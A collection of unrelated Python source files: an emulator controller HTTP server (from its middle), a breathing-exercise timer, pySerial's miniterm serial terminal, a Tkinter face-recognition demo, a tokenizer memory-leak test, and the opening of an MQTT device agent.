self.controls = ControllerState()
self.hold_response = True
self.running = True
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls, start_button=0):
#print('Send controls called')
self.controls = ControllerState(controls, start_button)
self.hold_response = False
# Wait for controls to be sent:
start = time.time()
while not self.hold_response and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, format, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(resp_data)
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully
self.write_response(500, "SHUTDOWN")
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.hold_response = True
return
###############################################
|
breadth.py
|
import sys
import threading
import time
import keyboard
TEXT = ["BREATHE IN", "HOLD", "BREATHE OUT"]
JJ = [0, 4, 11]
def my_code():
"""
The actual function to do the breathe patterns.
It rings a ``ding`` to alert user for hold breathe in and out
"""
i = 0
j = 0
while True:
print(" "*50, "\r", end="")
if i in [0, 4, 11, 19]:
print("\t\t\t{} {}".format(TEXT[j], i - JJ[j]), "\a", end="")
else:
print("\t\t\t{} {}".format(TEXT[j], i - JJ[j]), end="")
time.sleep(1)
i = i+1
if i > 4:
j = 1
if i > 11:
j = 2
if i >= 19:
i = 0
j = 0
def main():
my_thread = threading.Thread(target=my_code, daemon=True).start()
print("Press ESC to quit")
keyboard.wait("esc")
sys.exit()
|
miniterm.py
|
#!C:\Python27\python.exe
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# noport given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
facerec_with_gui.py
|
# -*- coding: utf-8 -*-
#######################################
__file__ = "facerec_with_gui.py"
__author__ = "Mesut Pişkin"
__version__ = "1.0"
__email__ = "mesutpiskin@outlook.com"
#######################################
from tkinter import *
import PIL.Image
import PIL.ImageTk
import tkinter.filedialog
import face_recognition
import cv2
import os
import threading
# Form object
frame = Tk()
frame.resizable(width=FALSE, height=FALSE)
frame.title("Face Recognition GUI")
frame.geometry("1024x768")
global lblImage
video_capture = cv2.VideoCapture(0)
known_face_encodings = []
known_face_names = []
global camera_is_open
global btnOpenCamera
def trainFaces():
print("---- Training Started ----")
for root, dirs, files in os.walk("./faces"):
for filename in files:
file_result = filename.split("_")
known_face_names.append(file_result[0])
image = face_recognition.load_image_file("faces/"+filename)
image_face_encoding = face_recognition.face_encodings(image)[0]
known_face_encodings.append(image_face_encoding)
print("Name: " + file_result[0])
print("---- Training Completed ----")
def faceRecognitionFromPicture(cvframe):
print("---- Recognized Started ----")
small_frame = cv2.resize(cvframe, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
small_rgb_frame = small_frame[:, :, ::-1]
# get face location
face_locations = face_recognition.face_locations(small_rgb_frame)
print("- Face location scan completed")
face_encodings = face_recognition.face_encodings(
small_rgb_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(
known_face_encodings, face_encoding)
name = "not recognized" # default name is not recognized
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
print("- Face Distance:")
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
for i, face_distance in enumerate(face_distances):
print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i))
print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6))
print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5))
print("- Face Locations:")
# print face data
print(*face_locations, sep='\n')
print(*face_names, sep='\n')
print("- Face name searching completed")
# draw face rectangle and name on current frame
drawFaceOnImage(cvframe, face_locations, face_names)
# Label string
faceNames = ''.join(face_names)
count = str(len(face_locations))
location = ','.join([str(i) for i in face_locations])
return_string = "\nNames: "+faceNames + \
"\nFace Count: "+count+"\nLocations: "+location+"\n"
lblTag["text"] = return_string
print("---- Recognized Completed ----")
def drawFaceOnImage(frame, face_locations, face_names):
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (153, 0, 51), 4)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, top + 35),
(right, top), (153, 0, 51), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 10, top + 25),
font, 1.0, (255, 255, 255), 2)
# write temp image file for lblimage item
cv2.imwrite("temp.jpg", frame)
def openFile():
camera_is_open = False
# open file dialog for picture
filename = tkinter.filedialog.askopenfilename(
initialdir="/", title="Choose Photo")
# recognize face
cvframe = cv2.imread(filename)
faceRecognitionFromPicture(cvframe)
# get recognized picture
im = PIL.Image.open("temp.jpg")
im = im.resize((700, 400))
photo = PIL.ImageTk.PhotoImage(im)
lblImage.configure(image=photo)
lblImage.image = photo
def openCamera():
global btnOpenCamera
global camera_is_open
if camera_is_open == False:
camera_is_open = True
btnOpenCamera["text"] = "Stop Camera"
videoThread = threading.Thread(
target=processCameraFrameForTkinter, args=())
videoThread.start()
else:
camera_is_open = False
btnOpenCamera["text"] = "Start Camera"
def processCameraFrameForTkinter():
global camera_is_open
while camera_is_open:
ret, frame = video_capture.read()
faceRecognitionFromPicture(frame)
# get recognized picture
im = PIL.Image.open("temp.jpg")
im = im.resize((960, 540))
photo = PIL.ImageTk.PhotoImage(im)
lblImage.configure(image=photo)
lblImage.image = photo
# or use cv2.imshow()
# train face in faces folder
trainFaces()
# form Components
btnOpenFile = Button(text="Recognize from photos", command=openFile)
lblTag = Label(text="",
bg="red", fg="white", font="Arial 18")
lblImage = Label()
btnOpenCamera = Button(text="Recognize from camera", command=openCamera)
btnOpenFile.pack()
btnOpenCamera.pack()
lblTag.pack()
lblImage.pack()
camera_is_open = False
mainloop()
|
memtest.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2014 Ben Kurtovic <ben.kurtovic@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for memory leaks in the CTokenizer. Python 2 and 3 compatible.
This appears to work mostly fine under Linux, but gives an absurd number of
false positives on OS X. I'm not sure why. Running the tests multiple times
yields different results (tests don't always leak, and the amount they leak by
varies). Increasing the number of loops results in a smaller bytes/loop value,
too, indicating the increase in memory usage might be due to something else.
Actual memory leaks typically leak very large amounts of memory (megabytes)
and scale with the number of loops.
"""
from __future__ import unicode_literals, print_function
from locale import LC_ALL, setlocale
from multiprocessing import Process, Pipe
from os import listdir, path
import sys
import psutil
from mwparserfromhell.compat import py3k
from mwparserfromhell.parser._tokenizer import CTokenizer
if sys.version_info[0] == 2:
range = xrange
LOOPS = 10000
class Color(object):
GRAY = "\x1b[30;1m"
GREEN = "\x1b[92m"
YELLOW = "\x1b[93m"
RESET = "\x1b[0m"
class MemoryTest(object):
"""Manages a memory test."""
def __init__(self):
self._tests = []
self._load()
def _parse_file(self, name, text):
tests = text.split("\n---\n")
counter = 1
digits = len(str(len(tests)))
for test in tests:
data = {"name": None, "label": None, "input": None, "output": None}
for line in test.strip().splitlines():
if line.startswith("name:"):
data["name"] = line[len("name:"):].strip()
elif line.startswith("label:"):
data["label"] = line[len("label:"):].strip()
elif line.startswith("input:"):
raw = line[len("input:"):].strip()
if raw[0] == '"' and raw[-1] == '"':
raw = raw[1:-1]
raw = raw.encode("raw_unicode_escape")
data["input"] = raw.decode("unicode_escape")
number = str(counter).zfill(digits)
fname = "test_{0}{1}_{2}".format(name, number, data["name"])
self._tests.append((fname, data["input"]))
counter += 1
def _load(self):
def load_file(filename):
with open(filename, "rU") as fp:
text = fp.read()
if not py3k:
text = text.decode("utf8")
name = path.split(filename)[1][:0-len(extension)]
self._parse_file(name, text)
root = path.split(path.dirname(path.abspath(__file__)))[0]
directory = path.join(root, "tests", "tokenizer")
extension = ".mwtest"
if len(sys.argv) > 2 and sys.argv[1] == "--use":
for name in sys.argv[2:]:
load_file(path.join(directory, name + extension))
sys.argv = [sys.argv[0]] # So unittest doesn't try to load these
else:
for filename in listdir(directory):
if not filename.endswith(extension):
continue
load_file(path.join(directory, filename))
@staticmethod
def _print_results(info1, info2):
r1, r2 = info1.rss, info2.rss
buff = 8192
if r2 - buff > r1:
d = r2 - r1
p = float(d) / r1
bpt = d // LOOPS
tmpl = "{0}LEAKING{1}: {2:n} bytes, {3:.2%} inc ({4:n} bytes/loop)"
sys.stdout.write(tmpl.format(Color.YELLOW, Color.RESET, d, p, bpt))
else:
sys.stdout.write("{0}OK{1}".format(Color.GREEN, Color.RESET))
def run(self):
"""Run the memory test suite."""
width = 1
for (name, _) in self._tests:
if len(name) > width:
width = len(name)
tmpl = "{0}[{1:03}/{2}]{3} {4}: "
for i, (name, text) in enumerate(self._tests, 1):
sys.stdout.write(tmpl.format(Color.GRAY, i, len(self._tests),
Color.RESET, name.ljust(width)))
sys.stdout.flush()
parent, child = Pipe()
p = Process(target=_runner, args=(text, child))
p.start()
try:
proc = psutil.Process(p.pid)
parent.recv()
parent.send("OK")
parent.recv()
info1 = proc.get_memory_info()
sys.stdout.flush()
parent.send("OK")
parent.recv()
info2 = proc.get_memory_info()
self._print_results(info1, info2)
sys.stdout.flush()
parent.send("OK")
finally:
proc.kill()
print()
def _runner(text, child):
r1, r2 = range(250), range(LOOPS)
for i in r1:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
child.send("OK")
child.recv()
for i in r2:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
if __name__ == "__main__":
setlocale(LC_ALL, "")
MemoryTest().run()
|
mqtt_agent.py
|
"""
Copyright (c) 2021 Software AG, Darmstadt, Germany and/or its licensors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import time
import ssl
import _thread
import threading
import paho.mqtt.client as mqtt
import c8ydm.utils.moduleloader as moduleloader
from c8ydm.client.rest_client import RestClient
from c8ydm.core.command import CommandHandler
from c8ydm.core.configuration import ConfigurationManager
from c8ydm.framework.smartrest import SmartRESTMessage
class Agent():
__sensors = []
__listeners = []
__supportedOperations = set()
__supportedTemplates = set()
stopmarker = 0
def __init__(self, serial, path, configuration, pidfile, simulated):
self.logger = logging.getLogger(__name__)
self.serial = serial
self.simulated = simulated
self.__client = mqtt.Client(serial)
self.configuration = configuration
self.pidfile = pidfile
self.path = path
self.url = self.configuration.getValue('mqtt', 'url')
self.port = self.configuration.getValue('mqtt', 'port')
self.ping = self.configuration.getValue(
'mqtt', 'ping.interval.seconds')
self.tls = self.configuration.getBooleanValue('mqtt', 'tls')
self.cacert = self.configuration.getValue('mqtt', 'cacert')
self.cert_auth = self.configuration.getBooleanValue(
'mqtt', 'cert_auth')
self.client_cert = self.configuration.getValue('mqtt', 'client_cert')
self.client_key = self.configuration.getValue('mqtt', 'client_key')
self.interval = int(self.configuration.getValue(
'agent', 'main.loop.interval.seconds'))
